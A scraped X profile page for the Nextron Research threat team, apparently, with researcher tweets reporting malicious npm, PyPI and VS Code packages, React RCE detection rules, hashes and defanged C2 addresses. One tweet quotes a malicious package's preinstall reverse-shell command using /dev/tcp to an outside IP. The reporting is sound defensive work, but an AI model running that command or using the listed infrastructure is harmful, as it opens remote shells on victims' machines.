nextronresearch Profile Banner
Nextron Research ⚡️ Profile
Nextron Research ⚡️

@nextronresearch

Followers
2K
Following
148
Media
64
Statuses
183

Nextron Systems Threat Research Team research (att) https://t.co/QTt2X62dXP

Frankfurt, Germany
Joined October 2024
Don't wanna be here? Send us removal request.
@nextronresearch
Nextron Research ⚡️
6 months
We analyzed the top 500 most successful THOR rules – “successful” meaning: they detected samples that were either ignored or missed by nearly all AV engines on VirusTotal. Some rules detect clear malware. Others reveal dual-use tools, renamed hacktools, misused admin binaries,
2
42
120
@cyb3rops
Florian Roth ⚡️
5 days
Generic detection rules FTW 🙌 The post-exploitation activity @wiz_io showed yesterday makes these scripts light up like a Christmas tree🎄: bash reverse shells, crypto miner indicators, history resets, wget/curl from http to bare IPs, base64 decoding, etc If you keep your
4
45
192
@cyb3rops
Florian Roth ⚡️
9 days
This pretty much sums up the situation: an in-memory (!) JavaScript-based (!) webshell gets implanted into a vulnerable React server with a single(!) POST request and leaves zero(!) trace in logs or on disk. Someone used that POC, successfully injected the shell and still
@cyb3rops
Florian Roth ⚡️
9 days
It’s wild how little sticks around when someone hits a server with the #React RCE payload. All the interesting parts of the POST request live for a moment in memory, get decoded, executed (or rejected), and vanish. Nothing hits a log, nothing lands on disk. You can scan process
13
128
989
@cyb3rops
Florian Roth ⚡️
9 days
It’s wild how little sticks around when someone hits a server with the #React RCE payload. All the interesting parts of the POST request live for a moment in memory, get decoded, executed (or rejected), and vanish. Nothing hits a log, nothing lands on disk. You can scan process
8
47
320
@cyb3rops
Florian Roth ⚡️
9 days
You may not have noticed and I didn’t even want to bother people with it earlier today, but I pushed a set of YARA rules that pick up memory traces from the published RSC exploitation chains. If someone hit your exposed React/Next.js instance with one of the public PoCs, these
@cyb3rops
Florian Roth ⚡️
9 days
It’s wild how little sticks around when someone hits a server with the #React RCE payload. All the interesting parts of the POST request live for a moment in memory, get decoded, executed (or rejected), and vanish. Nothing hits a log, nothing lands on disk. You can scan process
2
28
169
@cyb3rops
Florian Roth ⚡️
8 days
We’ve been digging through the #React RCE mess for two days now, trying to get at least some visibility into what’s going on out there. None of this is easy to detect, and most signals vanish in memory before you can even look at them. My teammate @_swachchhanda_ put together a
6
53
287
@smica83
Szabolcs Schmidt
13 days
'payload_1.ps1' looks like #NetSupport @abuse_ch https://t.co/E663Nqk6TB URL's (Russia): hxxp://80.64.19(.)114/fakeurl.htm hxxp://80.64.19(.)114:443/fakeurl.htm 3 AV and 8 Thor comments @nextronresearch
0
3
7
@smica83
Szabolcs Schmidt
13 days
FUD 'kryo_crypted_0ow5ljsy.bat' @abuse_ch https://t.co/siJgg2NLkg FUD with 2 @nextronresearch comments @skocherhan
0
3
6
@cod3nym
Jonathan Peters
12 days
We @nextronresearch scan many public repos like npm, pypi, vscode marketplace etc. And we find a lot of shitty malware :) Example: https://t.co/YwUVVxUXiG SHA256: 79cc98d0831e7b6a191000ec997ebc1853b1f6cc1190dbb855b97d7bf418c287 #PyPi
0
8
14
@marius_benthin
Marius Benthin
12 days
Malicious NPM package imitating expressjs/multer. It downloads payload from Google Firebase Storage. https://t.co/406XOvSoeY SHA-256: 3d3ebabe63cc6128194440210bffbafeac95c9a23bf294711a8637aa857b3648 #NPM #Google @nextronresearch
0
5
11
@smica83
Szabolcs Schmidt
16 days
'kryo_crypted_fgow4o24.bat' @abuse_ch https://t.co/irfMnbhI6q 9 AV but 9 thor comments @nextronresearch @skocherhan
2
3
7
@smica83
Szabolcs Schmidt
15 days
3
4
6
@nextronresearch
Nextron Research ⚡️
15 days
Follow-up on yesterday’s VS Code extension case: we finished the malware analysis of the Rust implants Solana-based C2, AES-encrypted JS stages, and a Google Calendar fallback channel with invisible Unicode tricks Write-up is here https://t.co/7ICrh2BEaE by @marius_benthin
2
26
78
@nextronresearch
Nextron Research ⚡️
16 days
We spotted a malicious #VSCode (@code) extension today in our artifact-scanning pipeline. It appeared under a name that tries to pass itself off as the popular Material Icon Theme. A new 5.29.1 version was pushed today (28.11., 11:34) and the update contains two Rust implants –
4
40
118
@marius_benthin
Marius Benthin
16 days
NPM package "baidu-src-test*" spawning reverse shell on installation via (pre)install script. sh -i >& /dev/tcp/43[.]160[.]194[.]214/53 0>&1 https://t.co/kwAPdFm4GS @nextronresearch #NPM #THOR
0
13
29
@smica83
Szabolcs Schmidt
19 days
FUD 'ihrewq.ps1' seen from Denmark and Russia @abuse_ch https://t.co/3lOSIqDQ6G 3 @nextronresearch comment Original URL: hxxps://62.60.226(.)251/downloads/ihrewq.ps1
0
1
3
@cyb3rops
Florian Roth ⚡️
19 days
The SHA1-Hulud npm mess keeps growing, so we added additional detections for it today - new YARA rules by my colleague @marius_benthin in our public signature-base - cover bun_environment.js / setup_bun.js and the malicious preinstall script variants from the Wiz / Aikido
Tweet card summary image
github.com
YARA signature and IOC database for my scanners and tools - Neo23x0/signature-base
@cyb3rops
Florian Roth ⚡️
20 days
We used to fight worms on the OS level. Slammer, Blaster, Conficker.. all that stuff Now we get the same behaviour one layer up - inside the software ecosystems we trust every day NPM tokens, transitive deps, weak account hygiene, zero visibility… and suddenly a
2
64
229
@smica83
Szabolcs Schmidt
20 days
0
3
9
@malwrhunterteam
MalwareHunterTeam
22 days
In 2024 August this "libmupdf.dll" sample was uploaded to VT from Mexico: ec5d14ca011ba8c12f4d51b0d463cf51051feaf1655c7f709dce3ffa625dfcf6 Today, for some reason, someone rescanned it. And now the sample is detected by ESET as NukeSped (meaning Lazarus). And with the rescan also
2
9
43
@smica83
Szabolcs Schmidt
26 days
FUD 'Cli_____________ent.bat' seen from the UK @abuse_ch https://t.co/TsIsndShmT C2: 208.91.189(.)183:4449 (TCP) Only 1 thor yara hit @nextronresearch
0
1
7